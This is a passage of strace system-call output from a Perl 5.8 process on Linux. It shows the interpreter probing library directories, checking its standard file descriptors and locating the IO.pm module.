12765 07:44:01.665180 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfe7afe0) = -1 ENOENT (No such file or directory)

12765 07:44:01.665196 stat64("/usr/local/lib/perl/5.8.7", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665208 stat64("/usr/local/share/perl/5.8.7", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665230 stat64("/usr/local/lib/perl/5.8.6", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665270 stat64("/usr/local/share/perl/5.8.6", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665283 stat64("/usr/local/lib/perl/5.8.4", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665309 stat64("/usr/local/share/perl/5.8.4", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665321 stat64("/usr/local/lib/perl/5.8.3", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665333 stat64("/usr/local/share/perl/5.8.3", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665345 stat64("/usr/local/lib/perl/5.8.2", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665357 stat64("/usr/local/share/perl/5.8.2", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665369 stat64("/usr/local/lib/perl/5.8.1", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665380 stat64("/usr/local/share/perl/5.8.1", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665392 stat64("/usr/local/lib/perl/5.8.0", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665404 stat64("/usr/local/share/perl/5.8.0", 0xbfe7b120) = -1 ENOENT (No such file or directory)

12765 07:44:01.665427 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe7ae18) = -1 ENOTTY (Inappropriate ioctl for device)

12765 07:44:01.665441 _llseek(0, 0, [0], SEEK_CUR) = 0

12765 07:44:01.665453 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe7ae18) = -1 EBADF (Bad file descriptor)

12765 07:44:01.665464 _llseek(1, 0, 0xbfe7ae60, SEEK_CUR) = -1 EBADF (Bad file descriptor)

12765 07:44:01.665475 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe7ae18) = -1 EINVAL (Invalid argument)

12765 07:44:01.665486 _llseek(2, 0, 0xbfe7ae60, SEEK_CUR) = -1 ESPIPE (Illegal seek)

12765 07:44:01.665496 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

12765 07:44:01.665509 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe7aed8) = -1 ENOTTY (Inappropriate ioctl for device)

12765 07:44:01.665519 _llseek(1, 0, [0], SEEK_CUR) = 0

12765 07:44:01.665534 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

12765 07:44:01.665546 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

12765 07:44:01.665564 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

12765 07:44:01.665617 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

12765 07:44:01.665662 getppid()         = 12763

12765 07:44:01.665753 stat64("/etc/perl/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665769 stat64("/etc/perl/IO.pm", 0xbfe7aadc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665797 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665810 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfe7aadc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665823 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665836 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfe7aadc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665850 stat64("/usr/lib/perl5/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665862 stat64("/usr/lib/perl5/IO.pm", 0xbfe7aadc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665875 stat64("/usr/share/perl5/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665888 stat64("/usr/share/perl5/IO.pm", 0xbfe7aadc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665901 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfe7abcc) = -1 ENOENT (No such file or directory)

12765 07:44:01.665914 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

12765 07:44:01.665935 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

